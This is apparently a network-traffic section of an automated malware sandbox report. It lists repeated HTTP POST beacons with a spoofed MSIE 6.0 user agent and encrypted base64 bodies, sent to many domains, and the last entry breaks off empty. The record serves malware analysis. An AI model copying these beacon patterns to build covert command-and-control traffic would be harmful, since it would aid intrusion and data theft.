                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 44 75 72 73 30 68 54 57 62 64 63 6c 49 4c 63 6e 37 38 70 43 32 47 65 75 49 5a 69 4d 4d 4d 73 32 69 41 54 50 72 36 66 78 79 4c 31 58 31 4c 38 45 5a 7a 71 63 69 66 4f 35 59 59 6d 47 6f 2b 41 31 58 41 68 72 44 32 49 66 71 47 75 6b 57 42 51 4b 72 62 74 36 78 63 6b 51 64 31 37 6e 4b 70 73 4b 72 79 37 4b 49 38 47 68 66 70 4a 31 58 2b 36 6f 47 56 4f 45 7a 4d 75 35 55 2f 35 48 2b 4a 4a 75 48 32 2b 4c 70 6d 77 54 74 4b 69 2f 6c 32 61 32 6b 49 42 50 7a 7a 31 61 6d 59 6c 76 77 70 43 77 67 55 30 30 47 42 6e 6e 46 30 59 32 68 57 31 44 66 65 51 6d 44 72 76 35 7a 32 4c 36 2b 72 79 2f 6c 30 42 52 6e 6a 45 68 6a 65 74 4a 70 6d 56 69 37 41 4d 71 68 65 41 50 42 62 4f 42 79 41 4e 2b 31 42 63 6b 69 71 48 69 4b 55 42 43 6e 38 46 64 4f 4f 30 7a 6e 64 6f 55 43 55 6d 33 52 52 44 61 35 69 68 6e 37 2b 39 4a 32 45 6b 2b 61 63 57 57 6b 79 46 39 6f 51 59 6f 4d 64 46 44 78 6e 4f 54 75 4a 48 70 55 79 75 69 43 69 41 4a 4c 36 54 41 65 32 48 5a 44 37 74 42 6d 7a 54 47 75 7a 7a 37 57 78 49 4a 75 46 33 4d 66 41 63 35 33 34 65 78 42 42 6f 71 36 57 52 62 65 47 55 77 78 48 4d 72 38 39 41 77 47 62 4e 45 65 37 36 45 6e 65 57 33 57 64 33 4b 36 59 4a 62 62 74 76 70 63 51 65 67 30 4d 79 33 44 79 4e 75 39 50 68 45 6c 6f 77 74 62 69 44 4f 59 39 69 65 65 42 7a 55 46 51 56 48 44 55 54 62 43 53 37 31 45 48 76 56 34 5a 76 55 6f 44 79 52 4d 52 71 79 51 68 42 37 51 79 6e 36 55 4b 7a 41 6c 51 57 58 2b 2f 4a 4e 62 56 4e 33 76 66 51 54 32 62 58 4b 2f 5a 77 4d 6d 69 36 69 50 58 56 65 30 77 7a 46 44 7a 59 71 32 47 4d 38 75 6a 5a 66 38 51 56 4c 43 4f 46 74 56 47 4b 62 7a 4f 76 53 65 56 63 6e 74 6a 2f 71 6c 45 66 35 34 53 51 50 38 6b 70 42 2b 57 50 6e 75 79 6f 3d Data Ascii: Durs0hTWbdclILcn78pC2GeuIZiMMMs2iATPr6fxyL1X1L8EZzqcifO5YYmGo+A1XAhrD2IfqGukWBQKrbt6xckQd17nKpsKry7KI8GhfpJ1X+6oGVOEzMu5U/5H+JJuH2+LpmwTtKi/l2a2kIBPzz1amYlvwpCwgU00GBnnF0Y2hW1DfeQmDrv5z2L6+ry/l0BRnjEhjetJpmVi7AMqheAPBbOByAN+1BckiqHiKUBCn8FdOO0zndoUCUm3RRDa5ihn7+9J2Ek+acWWkyF9oQYoMdFDxnOTuJHpUyuiCiAJL6TAe2HZD7tBmzTGuzz7WxIJuF3MfAc534exBBoq6WRbeGUwxHMr89AwGbNEe76EneW3Wd3K6YJbbtvpcQeg0My3DyNu9PhElowtbiDOY9ieeBzUFQVHDUTbCS71EHvV4ZvUoDyRMRqyQhB7Qyn6UKzAlQWX+/JNbVN3vfQT2bXK/ZwMmi6iPXVe0wzFDzYq2GM8ujZf8QVLCOFtVGKbzOvSeVcntj/qlEf54SQP8kpB+WPnuyo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 41 53 65 6a 48 34 38 44 61 4e 66 6b 5a 44 5a 61 4c 68 73 5a 39 35 6a 6b 69 58 77 6c 39 30 45 47 4d 38 53 77 50 52 66 55 4c 75 70 42 68 31 39 6c 67 66 49 48 63 52 70 49 6a 68 78 65 61 58 74 67 5a 63 57 74 64 67 4f 53 58 30 4a 75 70 2b 30 5a 46 34 6f 73 6c 31 74 6b 32 2b 33 4b 7a 79 4f 52 4d 76 76 48 5a 65 30 6b 7a 56 65 73 62 58 4c 41 47 35 36 61 34 33 62 45 54 6b 4e 33 70 41 71 62 51 39 54 77 41 53 63 33 75 56 56 4a 53 49 2b 6c 47 38 2f 72 67 49 2f 53 41 36 39 47 4a 31 78 73 4e 35 68 49 47 32 53 71 4a 6e 42 70 4d 78 57 35 70 32 48 59 6c 43 62 69 62 47 61 52 63 79 37 4b 76 2f 58 56 61 46 45 66 70 36 6f 69 58 73 61 52 6c 37 4d 42 67 53 31 75 71 64 6b 47 75 2b 42 32 5a 74 42 4a 6d 65 39 57 55 32 6f 43 41 4b 7a 4b 66 49 62 6c 32 76 4c 34 51 38 57 59 4e 37 56 31 50 72 58 6c 4d 2f 51 6d 2b 67 74 46 32 72 51 76 47 59 34 62 64 67 73 75 31 53 62 72 50 57 79 79 43 45 61 63 41 43 37 2b 7a 66 42 62 66 53 64 38 77 67 55 70 62 6a 79 43 4d 79 79 59 51 72 70 6d 49 55 69 48 42 34 77 53 33 43 43 6b 73 78 73 70 30 4c 4b 31 4a 45 53 68 42 4e 57 6c 52 6b 73 50 32 2b 5a 53 71 4d 6e 33 72 41 61 75 55 4b 57 47 4f 61 53 79 56 37 30 72 74 71 65 48 75 77 63 6c 69 48 35 36 51 4a 55 64 4b 6f 4e 66 68 2b 44 70 36 6a 2f 72 4a 38 38 67 48 53 51 41 4c 6f 77 33 56 4b 36 49 4f 32 69 68 39 35 4b 38 35 46 6a 77 6c 61 41 53 36 49 38 4c 6d 43 5a 38 74 43 65 4c 65 64 73 52 49 4b 54 43 56 7a 72 79 46 69 77 59 69 2f 4d 59 6c 6e 43 6f 50 7a 57 48 43 64 65 2b 5a 76 75 30 4b 41 75 4d 6b 68 30 56 43 34 4f 6d 58 49 78 37 57 36 50 53 5a 71 6e 45 46 54 61 30 42 70 38 2f 38 67 76 6b 6c 39 6f 6c 48 6e 41 47 65 67 69 63 57 39 6c 4d 30 7a 61 63 6c 4b 61 53 33 69 67 38 4f 45 6b 39 73 2b 44 73 62 69 35 6f 6f 50 49 54 65 48 43 76 62 5a 49 3d Data Ascii: ASejH48DaNfkZDZaLhsZ95jkiXwl90EGM8SwPRfULupBh19lgfIHcRpIjhxeaXtgZcWtdgOSX0Jup+0ZF4osl1tk2+3KzyORMvvHZe0kzVesbXLAG56a43bETkN3pAqbQ9TwASc3uVVJSI+lG8/rgI/SA69GJ1xsN5hIG2SqJnBpMxW5p2HYlCbibGaRcy7Kv/XVaFEfp6oiXsaRl7MBgS1uqdkGu+B2ZtBJme9WU2oCAKzKfIbl2vL4Q8WYN7V1PrXlM/Qm+gtF2rQvGY4bdgsu1SbrPWyyCEacAC7+zfBbfSd8wgUpbjyCMyyYQrpmIUiHB4wS3CCksxsp0LK1JEShBNWlRksP2+ZSqMn3rAauUKWGOaSyV70rtqeHuwcliH56QJUdKoNfh+Dp6j/rJ88gHSQALow3VK6IO2ih95K85FjwlaAS6I8LmCZ8tCeLedsRIKTCVzryFiwYi/MYlnCoPzWHCde+Zvu0KAuMkh0VC4OmXIx7W6PSZqnEFTa0Bp8/8gvkl9olHnAGegicW9lM0zaclKaS3ig8OEk9s+Dsbi5ooPITeHCvbZI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 2b 54 6d 75 76 58 59 6c 62 64 64 51 4a 58 31 2b 30 64 35 73 55 68 6c 4f 70 49 4f 57 43 48 44 51 43 71 46 66 42 37 6a 59 4a 70 67 61 79 43 34 42 4c 47 30 30 4e 64 30 59 56 6c 70 6f 64 76 33 4b 39 65 55 4d 48 76 6a 4c 2f 78 79 32 61 6f 51 30 6d 38 56 6f 69 56 39 55 6c 47 64 76 6f 53 37 4f 6e 76 75 59 55 36 7a 47 6e 62 59 6a 31 75 4e 79 75 5a 64 67 46 32 7a 79 4c 33 43 6a 67 73 79 41 74 46 4f 33 6a 33 51 63 79 36 6e 36 6f 35 69 55 73 69 6b 36 38 71 58 4b 76 6e 41 46 2b 6b 6a 2f 62 6c 65 43 47 30 6e 56 30 57 66 6d 49 6e 70 69 42 78 67 41 72 2b 75 65 79 44 61 76 37 4a 59 70 51 71 2b 4e 68 49 59 57 6b 74 7a 37 73 2b 6d 73 31 61 37 4f 6a 6f 42 54 50 66 58 55 75 4b 4c 53 4f 4c 6f 50 4f 33 75 34 46 78 50 39 6d 79 4a 50 79 58 33 69 6e 31 42 61 51 41 64 38 76 32 4a 4e 6c 33 48 42 72 53 64 36 6b 66 64 6d 48 4d 41 2b 6d 72 4d 6a 5a 68 34 5a 50 4b 78 78 4b 63 67 73 66 66 6c 68 6c 4f 49 6b 6c 37 39 75 74 52 69 30 4e 67 6c 50 63 36 35 6f 2f 6a 68 4c 4c 77 39 38 31 39 48 6a 65 4c 39 73 46 2f 30 44 36 56 44 44 50 45 2b 76 61 33 32 78 61 32 39 75 59 6b 41 57 70 79 35 46 4f 5a 78 6f 77 43 4f 39 4e 37 61 56 58 6e 79 46 73 34 6d 6c 6f 37 45 39 58 72 64 56 48 47 44 66 31 73 56 31 51 64 75 49 6f 68 45 30 47 2f 47 72 71 48 2f 6e 31 45 30 7a 7a 43 67 38 76 4f 43 63 65 41 64 50 6e 61 76 47 6a 63 48 57 53 79 69 69 41 49 34 58 49 4f 31 79 77 6e 67 6a 54 6e 64 73 30 31 54 4c 33 31 6d 32 79 46 62 30 4f 51 4c 51 35 46 44 50 4b 6e 35 70 54 2f 79 50 7a 35 71 41 68 4e 76 2b 47 78 39 52 70 4f 46 75 39 6b 6f 75 2f 63 73 32 4a 46 4d 52 4e 62 69 59 47 34 4a 47 2f 32 46 68 5a 69 33 4c 31 65 73 32 78 6b 41 74 6c 30 4d 5a 5a 55 77 46 Data Ascii: +TmuvXYlbddQJX1+0d5sUhlOpIOWCHDQCqFfB7jYJpgayC4BLG00Nd0YVlpodv3K9eUMHvjL/xy2aoQ0m8VoiV9UlGdvoS7OnvuYU6zGnbYj1uNyuZdgF2zyL3CjgsyAtFO3j3Qcy6n6o5iUsik68qXKvnAF+kj/bleCG0nV0WfmInpiBxgAr+ueyDav7JYpQq+NhIYWktz7s+ms1a7OjoBTPfXUuKLSOLoPO3u4FxP9myJPyX3in1BaQAd8v2JNl3HBrSd6kfdmHMA+mrMjZh4ZPKxxKcgsfflhlOIkl79utRi0NglPc65o/jhLLw9819HjeL9sF/0D6VDDPE+va32xa29uYkAWpy5FOZxowCO9N7aVXnyFs4mlo7E9XrdVHGDf1sV1QduIohE0G/GrqH/n1E0zzCg8vOCceAdPnavGjcHWSyiiAI4XIO1ywngjTnds01TL31m2yFb0OQLQ5FDPKn5pT/yPz5qAhNv+Gx9RpOFu9kou/cs2JFMRNbiYG4JG/2FhZi3L1es2xkAtl0MZZUwF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 78 42 77 34 31 6e 66 78 62 64 64 4b 6b 4b 72 6a 35 71 44 59 6a 38 42 57 73 34 51 74 54 79 69 30 6d 39 78 67 4e 56 46 46 56 61 53 51 59 62 62 49 6e 41 35 54 46 73 6d 53 62 5a 32 72 65 63 44 53 74 31 6a 78 30 36 47 6a 43 2b 66 56 2b 46 76 78 71 34 41 66 33 63 64 5a 56 6e 38 61 50 53 35 77 49 4b 70 51 38 6c 30 57 6d 64 6a 33 69 76 42 56 35 78 68 45 6f 34 37 73 2f 64 5a 39 6a 44 56 36 42 4b 4e 50 58 51 7a 4f 66 59 63 45 4f 64 4f 75 4d 51 47 75 6c 2b 65 6c 77 41 52 54 75 30 4a 6f 39 4c 7a 52 64 74 4d 75 6b 44 67 71 46 65 42 78 76 54 6f 44 6c 4b 79 66 53 50 57 69 63 32 6e 51 36 32 65 4f 61 49 50 38 48 36 2b 58 77 75 64 39 37 43 6b 63 49 4e 4f 39 4e 6a 53 47 39 54 69 77 31 71 2b 68 6f 77 48 55 78 36 51 4c 69 4c 76 48 55 5a 49 32 6e 33 57 42 6b 30 74 55 66 30 4e 7a 5a 77 7a 4b 50 4d 46 6d 65 50 79 4d 65 50 32 38 72 33 59 69 5a 6b 6f 34 71 4d 71 44 76 78 4b 61 63 76 46 4a 52 41 2f 66 35 36 52 33 36 4a 59 50 5a 6a 75 45 47 74 4f 72 65 2b 43 32 31 45 45 53 54 76 57 38 4d 54 67 54 46 55 43 35 72 70 42 65 44 72 31 77 64 58 41 42 67 78 6c 30 75 56 66 4d 2b 61 4a 44 57 57 52 62 4a 72 36 4a 67 44 41 6a 64 51 33 6f 51 43 43 4c 41 39 63 2f 75 69 71 78 4a 46 6d 34 36 77 6a 46 6e 4a 49 77 5a 46 70 37 6a 52 62 41 42 48 51 6b 69 4c 6d 4e 75 68 70 35 39 71 59 4f 73 71 4b 30 49 7a 34 6e 6b 79 32 4f 42 75 44 32 36 59 62 6e 65 77 4b 4b 56 47 63 72 48 39 55 65 2b 66 77 39 58 4d 4a 32 67 64 6f 5a 6c 7a 30 57 79 5a 4f 49 49 59 53 6b 43 64 51 79 52 6d 37 6b 69 77 41 6d 30 30 4a 68 6d 37 75 79 44 56 32 41 54 36 50 68 71 63 66 51 7a 73 6c 4a 55 35 78 6d 37 65 2f 77 75 66 34 37 61 6f 70 2f 6a 4e 31 5a 4b 69 6b 5a 44 52 2f 67 43 6c 4d 3d Data Ascii: xBw41nfxbddKkKrj5qDYj8BWs4QtTyi0m9xgNVFFVaSQYbbInA5TFsmSbZ2recDSt1jx06GjC+fV+Fvxq4Af3cdZVn8aPS5wIKpQ8l0Wmdj3ivBV5xhEo47s/dZ9jDV6BKNPXQzOfYcEOdOuMQGul+elwARTu0Jo9LzRdtMukDgqFeBxvToDlKyfSPWic2nQ62eOaIP8H6+Xwud97CkcINO9NjSG9Tiw1q+howHUx6QLiLvHUZI2n3WBk0tUf0NzZwzKPMFmePyMeP28r3YiZko4qMqDvxKacvFJRA/f56R36JYPZjuEGtOre+C21EESTvW8MTgTFUC5rpBeDr1wdXABgxl0uVfM+aJDWWRbJr6JgDAjdQ3oQCCLA9c/uiqxJFm46wjFnJIwZFp7jRbABHQkiLmNuhp59qYOsqK0Iz4nky2OBuD26YbnewKKVGcrH9Ue+fw9XMJ2gdoZlz0WyZOIIYSkCdQyRm7kiwAm00Jhm7uyDV2AT6PhqcfQzslJU5xm7e/wuf47aop/jN1ZKikZDR/gClM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=84.17.52.43; btst=22e3266e666b01bd481013a71d763072|84.17.52.43|1690487013|1690486974|11|3|0Data Raw: 68 74 76 67 2f 6e 39 44 62 39 66 78 52 35 74 57 58 76 70 67 47 51 68 65 7a 61 6a 56 58 57 6d 65 49 34 50 74 64 44 2b 42 49 52 63 52 6b 74 71 6a 55 30 31 37 4c 76 73 35 51 32 75 75 31 2f 6f 6c 49 73 67 51 42 56 33 6d 59 69 6b 39 4a 6d 37 39 4c 42 6e 37 4d 78 79 63 72 78 62 59 43 70 74 4d 67 38 62 74 45 71 4a 6d 34 50 70 6d 45 32 69 64 6e 67 4a 78 51 78 74 72 6c 4a 64 6d 55 33 50 67 31 37 67 50 4e 54 68 30 67 66 69 6c 77 5a 35 5a 53 56 42 78 5a 45 54 64 51 42 52 65 32 4b 69 53 66 5a 63 6f 42 61 63 6d 4f 75 54 31 7a 46 34 41 4c 5a 74 2f 69 33 4b 69 53 2f 6b 59 75 2f 63 4d 53 41 66 51 6c 6d 44 74 63 2b 5a 4b 77 41 45 75 6a 77 36 5a 71 70 79 64 4d 66 43 69 7a 31 47 79 4d 4d 4b 33 76 43 69 48 4e 4e 6b 57 4a 79 46 48 66 67 6c 55 55 57 6f 55 50 61 61 62 51 32 39 67 71 67 6f 55 52 47 62 2b 37 4f 51 67 59 71 42 32 58 65 63 79 71 4d 32 4a 43 4b 7a 5a 53 76 33 44 65 74 55 56 38 4b 7a 59 52 36 51 68 44 52 70 45 4b 76 42 30 45 2b 6e 46 2f 4e 7a 35 4f 4b 67 59 38 64 63 2b 41 37 43 77 34 37 77 30 41 2b 49 6b 34 33 6f 72 6a 72 56 72 30 62 6d 46 52 47 76 4c 4b 66 54 2b 59 7a 45 48 66 72 65 2b 5a 73 4d 41 4a 7a 59 46 37 72 39 36 41 35 2b 58 49 37 63 57 70 6e 55 45 64 59 77 66 69 57 52 39 50 2f 33 4e 37 69 4c 6a 55 45 6e 58 46 58 52 4e 6d 38 55 4e 37 37 4b 48 48 66 46 70 77 44 62 6f 5a 43 38 71 31 2f 45 4e 47 61 58 66 74 38 79 50 6d 66 44 6b 62 53 66 72 58 2b 30 62 72 73 76 4d 2b 74 62 6d 6c 42 47 54 39 53 39 61 34 78 69 45 32 74 4a 47 5a 77 71 66 45 42 45 79 63 63 49 34 68 6d 79 69 44 79 38 44 59 36 67 53 63 6a 74 67 52 6f 59 6e 79 71 72 6b 52 4d 34 2f 43 46 4e 43 32 51 51 58 30 36 63 6f 62 52 43 54 49 68 45 74 30 42 56 62 74 50 56 6e 35 55 79 2f 57 7a 32 31 4b 42 4e 79 44 4c 79 55 69 53 6a 66 32 55 57 69 78 7a 71 6e 53 74 65 72 75 50 36 6d 6b 6c 6f 3d Data Ascii: htvg/n9Db9fxR5tWXvpgGQhezajVXWmeI4PtdD+BIRcRktqjU017Lvs5Q2uu1/olIsgQBV3mYik9Jm79LBn7MxycrxbYCptMg8btEqJm4PpmE2idngJxQxtrlJdmU3Pg17gPNTh0gfilwZ5ZSVBxZETdQBRe2KiSfZcoBacmOuT1zF4ALZt/i3KiS/kYu/cMSAfQlmDtc+ZKwAEujw6ZqpydMfCiz1GyMMK3vCiHNNkWJyFHfglUUWoUPaabQ29gqgoURGb+7OQgYqB2XecyqM2JCKzZSv3DetUV8KzYR6QhDRpEKvB0E+nF/Nz5OKgY8dc+A7Cw47w0A+Ik43orjrVr0bmFRGvLKfT+YzEHfre+ZsMAJzYF7r96A5+XI7cWpnUEdYwfiWR9P/3N7iLjUEnXFXRNm8UN77KHHfFpwDboZC8q1/ENGaXft8yPmfDkbSfrX+0brsvM+tbmlBGT9S9a4xiE2tJGZwqfEBEyccI4hmyiDy8DY6gScjtgRoYnyqrkRM4/CFNC2QQX06cobRCTIhEt0BVbtPVn5Uy/Wz21KBNyDLyUiSjf2UWixzqnSteruP6mklo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 2f 4a 7a 51 35 5a 73 54 66 39 66 6e 70 47 4e 2b 73 72 54 56 75 59 54 4d 4a 32 77 68 42 72 72 42 2f 2b 37 6e 47 79 5a 4c 38 44 36 2f 4c 4a 74 67 47 46 73 56 51 48 50 6e 61 69 70 56 41 53 63 37 76 35 4b 44 70 4e 65 30 47 54 51 35 31 70 4a 2b 49 58 39 6f 52 4e 75 54 64 72 4a 39 59 71 4f 36 56 52 61 6f 74 76 4c 4f 75 59 5a 44 4a 41 75 6d 48 55 79 6b 7a 68 6f 6c 4b 62 76 50 71 39 67 70 35 4a 48 77 35 56 71 54 6f 57 6d 64 68 46 4c 4f 42 32 57 62 51 63 37 38 5a 73 51 7a 36 6d 72 49 70 6f 50 73 54 39 69 69 2f 66 4e 59 73 4e 65 41 68 75 49 2b 39 61 4f 31 4a 78 44 6b 58 7a 61 36 69 2f 53 32 37 71 6a 6f 36 4c 73 4d 56 79 2f 55 38 47 4c 71 49 32 4f 44 75 49 75 6e 48 31 7a 6a 6e 55 75 6b 30 51 63 6b 79 44 53 58 38 79 79 59 63 2f 57 59 72 49 70 30 78 71 36 41 32 45 61 71 59 37 31 4c 6d 56 4a 4a 4e 44 42 67 59 4f 74 34 59 59 58 66 51 6b 76 4e 38 2b 79 46 63 77 52 46 50 7a 2b 55 41 4f 73 65 35 68 30 45 62 38 6a 32 41 77 51 4b 59 69 31 7a 30 4a 33 6e 68 31 73 62 69 6c 50 44 72 38 54 56 49 35 32 59 50 73 69 6a 44 38 44 49 36 34 44 78 33 4a 50 4e 46 4b 4a 56 36 72 35 66 52 4a 51 6d 51 42 45 64 4f 76 36 57 2b 6f 65 63 45 74 30 2f 46 34 42 4c 35 50 4f 76 31 6c 38 74 49 63 77 79 4e 30 76 53 56 4b 64 58 4d 2b 36 32 6b 58 2b 4b 4a 6f 49 52 42 69 36 4d 69 56 54 76 71 4f 46 70 48 65 48 41 47 47 33 35 65 6c 64 58 35 51 61 6d 37 48 72 51 49 6f 45 5a 61 45 74 4b 6a 6c 78 72 56 46 35 5a 78 74 51 68 42 49 4c 36 39 51 4c 39 69 64 4c 45 64 55 4b 61 69 41 4f 2b 33 56 69 4c 50 66 6a 7a 6a 37 7a 72 76 6b 48 77 6e 41 36 42 71 38 4c 6a 50 77 30 30 79 39 4e 2f 30 6e 39 33 62 43 74 4d 70 4c 31 6e 45 51 4c 39 38 2b 2b 64 Data Ascii: /JzQ5ZsTf9fnpGN+srTVuYTMJ2whBrrB/+7nGyZL8D6/LJtgGFsVQHPnaipVASc7v5KDpNe0GTQ51pJ+IX9oRNuTdrJ9YqO6VRaotvLOuYZDJAumHUykzholKbvPq9gp5JHw5VqToWmdhFLOB2WbQc78ZsQz6mrIpoPsT9ii/fNYsNeAhuI+9aO1JxDkXza6i/S27qjo6LsMVy/U8GLqI2ODuIunH1zjnUuk0QckyDSX8yyYc/WYrIp0xq6A2EaqY71LmVJJNDBgYOt4YYXfQkvN8+yFcwRFPz+UAOse5h0Eb8j2AwQKYi1z0J3nh1sbilPDr8TVI52YPsijD8DI64Dx3JPNFKJV6r5fRJQmQBEdOv6W+oecEt0/F4BL5POv1l8tIcwyN0vSVKdXM+62kX+KJoIRBi6MiVTvqOFpHeHAGG35eldX5Qam7HrQIoEZaEtKjlxrVF5ZxtQhBIL69QL9idLEdUKaiAO+3ViLPfjzj7zrvkHwnA6Bq8LjPw00y9N/0n93bCtMpL1nEQL98++d
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 6b 56 66 55 35 62 77 54 66 39 65 45 73 59 41 4f 5a 39 73 62 76 55 2f 43 61 32 70 55 6f 79 52 61 73 49 43 65 56 41 6b 57 77 30 46 4a 6a 4e 59 66 51 34 58 70 2b 53 78 63 58 76 65 38 48 38 4d 46 64 61 2f 56 72 63 56 4d 32 6a 42 50 32 6f 6f 55 64 36 56 79 77 5a 55 32 4f 6b 36 52 67 4f 50 31 4f 47 76 30 48 51 78 78 2f 67 30 64 2b 61 4e 63 32 74 59 46 32 77 48 42 2b 51 76 50 6d 56 55 73 78 37 34 31 64 2f 31 36 45 4f 65 50 2b 43 6e 31 32 6a 58 54 4a 73 45 6b 30 6a 4a 6b 65 31 4e 54 68 4a 4d 70 37 51 51 79 72 65 6d 64 4f 63 78 78 66 51 4e 2f 71 38 4f 78 50 31 30 56 51 58 61 35 41 4f 77 6b 4d 34 75 44 37 63 58 2f 67 74 72 79 45 45 52 78 53 73 30 74 34 32 4c 33 54 67 44 79 66 4f 35 66 73 6e 72 48 70 70 64 55 48 4e 6b 42 36 59 46 78 45 4b 31 54 52 2b 34 72 50 35 62 31 66 4e 73 74 56 78 6f 75 45 37 41 50 4c 63 50 49 30 68 61 4d 4e 4e 37 30 72 51 2b 2f 67 50 53 4c 6e 78 6a 5a 6d 56 37 56 6b 48 44 45 7a 65 53 48 42 79 61 70 32 4b 2b 64 38 57 38 6c 6f 50 50 50 57 6d 4d 4c 53 33 43 53 76 6e 4b 4f 36 30 31 32 68 49 41 34 71 72 4f 66 52 4c 7a 39 63 72 51 6f 30 6b 37 2f 34 38 64 65 4e 35 76 56 38 55 42 41 50 61 2f 47 72 35 37 52 36 62 73 44 72 6d 42 6e 50 35 4b 6a 34 48 4e 63 50 38 50 6c 75 5a 4e 46 50 66 2b 54 30 76 79 59 69 35 45 39 72 35 39 58 4a 69 67 37 64 36 5a 62 32 57 67 73 43 33 74 4b 4b 76 4a 74 7a 66 6d 58 41 77 75 47 79 56 71 65 51 45 6d 69 52 59 4a 42 2b 56 69 71 63 6a 78 71 62 51 4b 30 66 43 39 68 58 58 62 6d 6c 59 36 34 38 7a 56 66 41 56 51 34 50 67 39 79 50 45 38 41 2b 6b 48 4c 55 66 5a 56 38 62 52 6b 6d 59 6d 4c 2f 69 52 74 30 79 61 48 50 63 55 74 46 47 38 7a 45 6b 47 79 42 41 54 32 6c 41 55 3d Data Ascii: kVfU5bwTf9eEsYAOZ9sbvU/Ca2pUoyRasICeVAkWw0FJjNYfQ4Xp+SxcXve8H8MFda/VrcVM2jBP2ooUd6VywZU2Ok6RgOP1OGv0HQxx/g0d+aNc2tYF2wHB+QvPmVUsx741d/16EOeP+Cn12jXTJsEk0jJke1NThJMp7QQyremdOcxxfQN/q8OxP10VQXa5AOwkM4uD7cX/gtryEERxSs0t42L3TgDyfO5fsnrHppdUHNkB6YFxEK1TR+4rP5b1fNstVxouE7APLcPI0haMNN70rQ+/gPSLnxjZmV7VkHDEzeSHByap2K+d8W8loPPPWmMLS3CSvnKO6012hIA4qrOfRLz9crQo0k7/48deN5vV8UBAPa/Gr57R6bsDrmBnP5Kj4HNcP8PluZNFPf+T0vyYi5E9r59XJig7d6Zb2WgsC3tKKvJtzfmXAwuGyVqeQEmiRYJB+ViqcjxqbQK0fC9hXXbmlY648zVfAVQ4Pg9yPE8A+kHLUfZV8bRkmYmL/iRt0yaHPcUtFG8zEkGyBAT2lAU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 53 79 50 70 36 61 63 31 66 39 65 64 46 62 56 73 56 6a 61 55 47 6e 43 61 47 76 38 64 33 34 36 73 79 38 4e 66 76 75 6a 61 44 6c 68 66 57 73 4d 74 77 35 52 67 6c 30 72 4d 43 30 45 6c 39 72 54 69 63 4d 46 43 6c 76 73 61 78 70 50 37 52 65 57 63 4a 34 58 75 71 73 6f 34 34 69 63 50 4d 55 37 39 48 2b 38 49 33 47 72 59 57 38 46 37 62 49 72 61 69 61 68 64 65 51 2b 59 36 48 59 6d 5a 41 55 64 66 30 33 69 39 69 4c 34 36 30 43 34 57 48 75 61 68 35 37 65 35 35 2f 32 64 4a 52 69 4f 6d 2b 2f 6b 6e 72 4d 58 31 33 6e 72 62 7a 4a 33 35 36 58 47 47 50 6c 52 33 50 2b 74 39 5a 48 6c 30 43 50 62 79 4e 69 43 4e 55 72 66 2f 5a 4e 30 74 2b 63 4c 69 62 2b 44 32 31 78 75 4e 75 31 30 4a 62 69 4c 41 58 43 66 6d 44 44 61 34 2b 53 45 6f 36 4f 47 77 53 41 45 35 34 6c 2b 56 31 54 4c 44 38 34 6a 35 33 4f 37 4f 41 4b 33 38 45 41 7a 4c 51 64 6c 45 33 38 53 79 78 4b 35 5a 33 37 39 63 6c 50 4c 61 35 49 77 54 38 4e 4f 65 52 4f 56 52 49 2f 39 67 68 6b 37 74 54 45 38 70 34 6c 42 70 55 75 31 70 45 4a 2b 51 6c 56 6b 5a 66 39 4b 62 46 62 58 53 70 2b 64 56 58 67 4a 42 55 53 66 61 36 48 4d 4e 73 47 44 39 4e 5a 65 71 47 57 45 36 6a 61 4b 58 49 43 44 7a 59 37 6a 32 58 78 4d 32 57 36 4c 6b 71 59 71 47 42 75 64 4d 37 42 2b 55 4e 69 4c 6e 56 7a 32 57 70 6b 78 4d 47 46 4e 76 4c 30 44 6f 73 66 58 70 74 5a 70 4f 50 2f 58 44 62 7a 50 6f 37 4c 62 63 50 66 4c 4e 6f 31 7a 6f 73 4f 52 41 6c 2b 62 45 4f 48 4b 48 63 6d 6a 69 41 49 45 59 4e 4f 54 50 64 61 62 47 50 6a 58 5a 42 55 69 74 42 6b 6e 59 56 38 62 6b 4d 56 73 65 59 61 56 67 30 76 34 59 70 47 31 65 64 46 4e 30 51 4b 34 62 78 55 38 75 59 69 55 50 61 52 47 4f 2f 5a 54 35 59 74 54 4b 37 42 59 4f 65 61 67 65 41 50 38 50 74 50 6d 37 38 42 36 35 51 69 68 32 4a 4c 6d 50 34 56 50 72 43 7a 67 67 3d 3d Data Ascii: 